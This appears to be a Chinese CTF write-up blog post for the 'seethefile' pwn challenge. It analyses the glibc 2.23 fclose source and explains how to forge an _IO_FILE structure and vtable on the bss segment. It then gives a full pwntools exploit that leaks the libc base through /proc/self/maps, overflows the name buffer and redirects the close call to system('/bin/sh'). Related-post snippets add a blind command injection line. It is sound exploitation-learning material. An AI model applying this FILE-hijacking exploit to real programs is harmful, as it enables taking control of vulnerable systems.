pwnable.kr seethefile

最新推荐文章于 2023-12-28 16:37:51 发布
最新推荐文章于 2023-12-28 16:37:51 发布
阅读量277 收藏
点赞数
分类专栏: 学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/111177823
版权

fclose 源码分析 缓冲区伪造 shell 系统调用
关键词由CSDN通过智能技术生成

忙里偷闲-------一道伪造_IO_file结构体的题目
发现文件结构体指针直接放在bss段上我们可以修改,很明显就是让我们伪造_IO_FILE结构体了,根据程序逻辑我们需要仔细阅读fclose函数分析源码ing

_IO_new_fclose (_IO_FILE *fp)
{
  int status;

  CHECK_FILE(fp, EOF);

#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1)
  /* We desperately try to help programs which are using streams in a
     strange way and mix old and new functions.  Detect old streams
     here.  */
  if (_IO_vtable_offset (fp) != 0)
    return _IO_old_fclose (fp);
#endif

  /* First unlink the stream.  */
  if (fp->_IO_file_flags & _IO_IS_FILEBUF)
    _IO_un_link ((struct _IO_FILE_plus *) fp);

  _IO_acquire_lock (fp);
  if (fp->_IO_file_flags & _IO_IS_FILEBUF)
    status = _IO_file_close_it (fp);
  else
    status = fp->_flags & _IO_ERR_SEEN ? -1 : 0;
  _IO_release_lock (fp);
  _IO_FINISH (fp);
  if (fp->_mode > 0)
    {
#if _LIBC
      /* This stream has a wide orientation.  This means we have to free
	 the conversion functions.  */
      struct _IO_codecvt *cc = fp->_codecvt;

      __libc_lock_lock (__gconv_lock);
      __gconv_release_step (cc->__cd_in.__cd.__steps);
      __gconv_release_step (cc->__cd_out.__cd.__steps);
      __libc_lock_unlock (__gconv_lock);
#endif
    }
  else
    {
      if (_IO_have_backup (fp))
	_IO_free_backup_area (fp);
    }
  if (fp != _IO_stdin && fp != _IO_stdout && fp != _IO_stderr)
    {
      fp->_IO_file_flags = 0;
      free(fp);
    }

  return status;
}

#ifdef _LIBC
versioned_symbol (libc, _IO_new_fclose, _IO_fclose, GLIBC_2_1);
strong_alias (_IO_new_fclose, __new_fclose)
versioned_symbol (libc, __new_fclose, fclose, GLIBC_2_1);
#endif

这是fclose的源码通过测试发现远程是2.23版本想到去伪造虚表,发现开始是想写finish然后发现fclose最后也会调用虚表_IO_close_t,就直接写其为system即可,我们伪造的时候会有一些曲折有一点不懂就是gs段寄存器的值,在0x48的位置要填好一个有效地址,然后_IO_FILE+0x8之后填\x00即可走到_IO_new_file_close_it

int
_IO_new_file_close_it (_IO_FILE *fp)
{
  int write_status;
  if (!_IO_file_is_open (fp))
    return EOF;

  if ((fp->_flags & _IO_NO_WRITES) == 0
      && (fp->_flags & _IO_CURRENTLY_PUTTING) != 0)
    write_status = _IO_do_flush (fp);
  else
    write_status = 0;

  _IO_unsave_markers (fp);

  int close_status = ((fp->_flags2 & _IO_FLAGS2_NOCLOSE) == 0
		      ? _IO_SYSCLOSE (fp) : 0);

  /* Free buffer. */
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
  if (fp->_mode > 0)
    {
      if (_IO_have_wbackup (fp))
	_IO_free_wbackup_area (fp);
      _IO_wsetb (fp, NULL, NULL, 0);
      _IO_wsetg (fp, NULL, NULL, NULL);
      _IO_wsetp (fp, NULL, NULL);
    }
#endif
  _IO_setb (fp, NULL, NULL, 0);
  _IO_setg (fp, NULL, NULL, NULL);
  _IO_setp (fp, NULL, NULL);

  _IO_un_link ((struct _IO_FILE_plus *) fp);
  fp->_flags = _IO_MAGIC|CLOSED_FILEBUF_FLAGS;
  fp->_fileno = -1;
  fp->_offset = _IO_pos_BAD;

  return close_status ? close_status : write_status;
}

我们就只需要走到_IO_SYSCLOSE即可打开shell
exp:

from pwn import *
p=process('./seethefile')
#p=remote('chall.pwnable.tw',10200)
elf=ELF('./seethefile')
libc=elf.libc
#libc=ELF('./libc_32.so.6')


def menu(idx):
	p.sendlineafter(':',str(idx))

def s_open(filename):
	menu(1)
	p.sendlineafter(':',filename)

def s_read():
	menu(2)

def s_write():
	menu(3)

def s_close():
	menu(4)

def leave(name):
	menu(5)
	p.sendlineafter(':',name)


bf=0x0804B260
s_open("/proc/self/maps")
s_read()
s_write()
p.recvuntil('[heap]\n')
libcbase=int('0x'+p.recv(8),16)+0x1000
log.success('libcbase: '+hex(libcbase))
system=libcbase+libc.sym['system']
payload='/bin/sh\x00'+'\x00'*4+p32(0)+p32(0)+p32(0)*3
payload+=p32(bf)
payload=payload.ljust(0x48,'\x00')
payload+=p32(bf+0x10)
payload=payload.ljust(0x60,'\x00')
payload+=p32(0)+p32(0)+p32(system)
payload+=(0x94-0x6c)*'\x02'
payload+=p32(bf+0x60)+p32(0)*3+p32(system)
leave(payload)
p.interactive()
doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PWN flag [pwnable.kr]CTF writeup题解系列4
重新启程
01-01 929
直接看题目 这是一道逆向题目,直接下载下来看看 root@mypwn:/ctf/work/pwnable.kr# wget http://pwnable.kr/bin/flag --2020-01-01 09:37:31-- http://pwnable.kr/bin/flag Resolving pwnable.kr (pwnable.kr)... 128.61.240.205 ...
pwnable.kr-fix
r00tnb的博客
02-28 872
前言 看似简单的改代码题,但是还是需要强大的汇编知识。花了很长时间,主要是自己对指令不是很熟悉。另外pwnable.kr的练习我会在另一个博客http://www.ktstartblog.top持续更新欢迎大家来踩。 分析 先分析源码fix.c #include <stdio.h> // 23byte shellcode from http://shell-storm...
(BUUCTF)pwnable_seethefile
最新发布
xy1458214551的博客
12-28 385
BUUCTF的pwnable_seethefile题解
pwnable.tw】 seethefile
weixin_30432179的博客
09-20 117
一开始特别懵的一道题。 main函数中一共4个功能,openfile、readfile、writefile、closefile。 其中,在最后退出时有一个明显的溢出,是scanf("%s",&name); name位于bss段上,name下面有一个fp用于存储文件指针,可以被覆盖。 再看其他函数: openfile.只有一个简单的输入并打开,保存文件指针在bss段上的fp...
pwnable.tw 9 seethefile [250 pts]
qq_42192672的博客
12-04 796
之前做了五道题直接做自闭了,各种手写shellcode,学到了很多姿势,这是一道文件题,没接触过,来挑战一下…… no canary found!!!!!! 拖进IDA分析 一共有五个功能 有一个明显的栈溢出 我们可以通过溢出name来覆盖fp 1)openfile:打开文件,文件指针就是fp,不能打开文件名为flag的文件 2)readfile:从fp读取0x18F个字节...
劫持vtable修改程序执行流——pwnable seethefile
weixin_46521144的博客
07-22 381
前置知识 vtable vtable是和file结构体并列的一段内容,是函数指针数组,其中包含了对file的一些操作函数。 以下来自ctf-wiki 在 libc2.23 版本下,32 位的 vtable 偏移为 0x94,64 位偏移为 0xd8 以下是vtable的实际结构,如图所示,我们需要关注的是close部分。也就是关闭文件时将会调用的函数。 ## 劫持原理 以下内容摘自https://www.jianshu.com/p/2e00afb01606 分析close函数,最关键的利用点在这里 注意
pwnable.tw seethefile 经验总结
qq_43189757的博客
11-13 533
关于伪造FILE结构体来getshell的题目, 又学到了点知识 程序逻辑分析: 程序的逻辑简单,简单的打开文件读取文件的操作, 但是对于flag进行了严格的过滤, 无法直接通过打开flag文件来读取flag, 在switch分支5处输入的name存在明显的溢出, 观察发现fp就在name地址下方, 可以通过溢出来控制fp指针, 接下来就是伪造fake FILE结构体了 原理: fp 指针指向的...
pwnable.kr之asm
Jason_ZhouYetao的博客
07-23 573
这题我认为主要考察的知识点一个是沙箱中可用函数还有就是shellcode这个大头问题。 首先看看这道题目的代码: root@kali:~# ssh asm@pwnable.kr -p2222 asm@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | ...
PWN dragon echo1 echo2 [pwnable.kr]CTF writeup题解系列16
重新启程
01-06 647
由于pwnable.kr说明了不要将题解的利用脚本直接提出来,所以我就简单说下思路,本篇包括三个题目 目录 0x01 dragon 0x02 echo1 0x03 echo2 0x01 dragon 执行步骤 整数溢出漏洞:pDragon->HP 的类型是 signed byte,所以当超过127,就是负数了。这就是整数溢出漏洞 uaf漏洞: 1. malloc person...
apachecn#apachecn-ctf-wiki#PWN-dragon-echo1-echo2-[pwnable.kr]CT
07-25
1. malloc person 2. malloc dragon 3. free dragon
getshell本质与深入探究
doudoudedi
03-26 5094
title: 反弹shellcode本质与深入探究 date: 2022-03-24 14:25:01 tags:PWN getshell本质与深入探究 目标 ​ 在做CTF-PWN方向题目时,总体流程就是分析漏洞程序、然后写利用脚本、攻击本地环境、攻击靶机环境得到flag,但是在攻击本地时为什么会获得本地的shell,同时攻击远程靶机时又为什么会获得远程靶机的shell呢?同样当我们攻击一个IOT设备时,会发现使用CTF-PWN中的方法不能够得到一个交互式的shell,今天就来一探究竟 基础 ​ 首先.
什么是uboot与bios?
doudoudedi
03-24 4359
title: what is uboot and bios? date: 2022-03-17 17:24:27 tags: 前言preface ​ 最近在漏洞挖掘过程中,涉及到了一些基础的知识比如BIOS,uboot,qemu模拟的方面。 ​ 首先开始我们需要了解机器是怎么运行的 ​ 一般我们使用的机器都是windows或者Linux,(本人是高端MAC本🤣), 什么是BIOS?他有什么用,他做了什么?按下开机键的时候机器干了啥? ​ 问: ​ 计算机是最讲逻辑,他会按照他的规则去运行,但是我们不知道.
Armv5_shellcode
doudoudedi
04-14 2838
Armv5_shellcode 背景: ​ 由于在pwntools生成的shellcode默认Armv7语法无法在Armv5指令集芯片下执行,所以写了以下shellcode便于漏洞的利用,此shellcode为Armv5上亲测可使用且无NULL byte,此shellcode主要是对栈进行了操作,未对代码段与数据段进行修改。 适用场景: ​ 1.目标适用busybox ​ 2.有栈溢出或者其他可以劫持程序流程漏洞 ​ 3.内存中布置好此段shellcode,且能执行 适用busybox /* #exec
pwn更换libc的方法
doudoudedi
08-05 1863
是不是常常为pwn的不同ubuntu环境而困扰 )小声我也是 这里分享一个patchelf的方法 首先下载patchelf然后执行着2条即可以 import os os.system("patchelf --set-interpreter /libc-ld.so/{} ./pwn1").format(your_input)#这里是将链接器准备好 os.system("patchelf --set-rpath /libc-ld.so/{} ./pwn1").format()#这里是将libc文件加载上
5月DASCTF
doudoudedi
05-24 1287
帮帮小红吧 命令盲注是我没有想到的 cat /flag |grep 'BJD{' || sleep(3); 密码bbcrypto 题目 # -*- coding:utf-8 -*- import A,SALT from itertools import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill
BUUCTF HarekazeCTF2019 babyrop2
doudoudedi
11-01 1245
这道题是用printf泄露已经调用过的函数确定libc文件然后用ROPgetshell(这里有格式化字符串,没有的话可以read一个然后在泄露反正够长) exp: #coding:utf-8 #name:doudou from pwn import * #p=process('./babyrop2') p=remote('node3.buuoj.cn',28818) elf=ELF('./baby...
windows-PWN小计
doudoudedi
09-26 1242
windows-pwn
记录护网暂停的日常(ciscn2020)
doudoudedi
08-28 1094
这几天我真的是忙的一 就记录一下这几天的pwn的思路 国赛pwn开始看no_free想到了house of orange但是不太会利用,堆学的不是很好.jpg 但是之后做就是感觉来了,晚上做了2到成功以分区十几名的成绩进入了分区赛,希望大佬们轻点打 钓鱼城杯就帮队伍做了2个pwn,真的难无法F5还是队友厉害 3个pwn babyjsc 这个硬是被玩成了签到,python的input函数有eval的功能就直接命令执行了如图所示 >>> input() __import__("os").sys
暑假pwn训练 第(十一)国赛pwn
doudoudedi
08-16 1022
昨天做了几道pwn题emem 今天也做了2道表示pwn好难被打自闭了… 昨天重新做了一下国赛的pwn题发现好像能做几道…当时的自己也是真的菜~~ pwn1就是常规思路泄露libc然后getshell // local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const c...
使用python 多线程爬取 https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999 网站
05-30
这个程序会爬取 https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999 网站的前5页内容,并使用5个线程进行爬取,提高爬取效率。 你可以根据需要修改程序中的线程数量和爬取页面的数量。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值